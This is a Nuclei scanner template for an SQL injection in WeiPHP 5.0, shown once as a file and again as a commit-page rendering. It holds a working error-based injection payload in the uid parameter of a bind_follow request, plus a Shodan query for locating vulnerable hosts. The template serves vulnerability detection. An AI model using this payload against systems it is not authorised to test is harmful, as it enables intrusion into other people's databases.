nuclei-templates/vulnerabilities/other/weiphp-sql-injection.yaml

id: weiphp-sql-injection

info:
  name: WeiPHP 5.0 SQLI
  author: pikpikcu
  severity: high
  reference:
    - https://github.com/Y4er/Y4er.com/blob/15f49973707f9d526a059470a074cb6e38a0e1ba/content/post/weiphp-exp-sql.md
  metadata:
    verified: true
    shodan-query: http.html:"WeiPHP5.0"
  tags: weiphp,sql

requests:
  - method: POST
    path:
      - "{{BaseURL}}/public/index.php/home/index/bind_follow/?publicid=1&is_ajax=1&uid[0]=exp&uid[1]=)%20and%20updatexml(1,concat(0x7e,md5('999999'),0x7e),1)--+ "

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "52c69e3a57331081823331c4e69d3f2"

      - type: status
        status:
          - 500
Create weiphp-sql-injection (#941) * Create weiphp-sql-injection.yaml * Update weiphp-sql-injection.yaml * Update weiphp-sql-injection.yaml Co-authored-by: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> 2022-07-26 11:58:08 +00:00			`id: weiphp-sql-injection`

			`info:`
			`name: WeiPHP 5.0 SQLI`
			`author: pikpikcu`
			`severity: high`
			`reference:`
			`- https://github.com/Y4er/Y4er.com/blob/15f49973707f9d526a059470a074cb6e38a0e1ba/content/post/weiphp-exp-sql.md`
			`metadata:`
			`verified: true`
			`shodan-query: http.html:"WeiPHP5.0"`
			`tags: weiphp,sql`

			`requests:`
			`- method: POST`
			`path:`
			`- "{{BaseURL}}/public/index.php/home/index/bind_follow/?publicid=1&is_ajax=1&uid[0]=exp&uid[1]=)%20and%20updatexml(1,concat(0x7e,md5('999999'),0x7e),1)--+ "`

			`matchers-condition: and`
			`matchers:`
			`- type: word`
			`part: body`
			`words:`
			`- "52c69e3a57331081823331c4e69d3f2"`

			`- type: status`
			`status:`
			`- 500`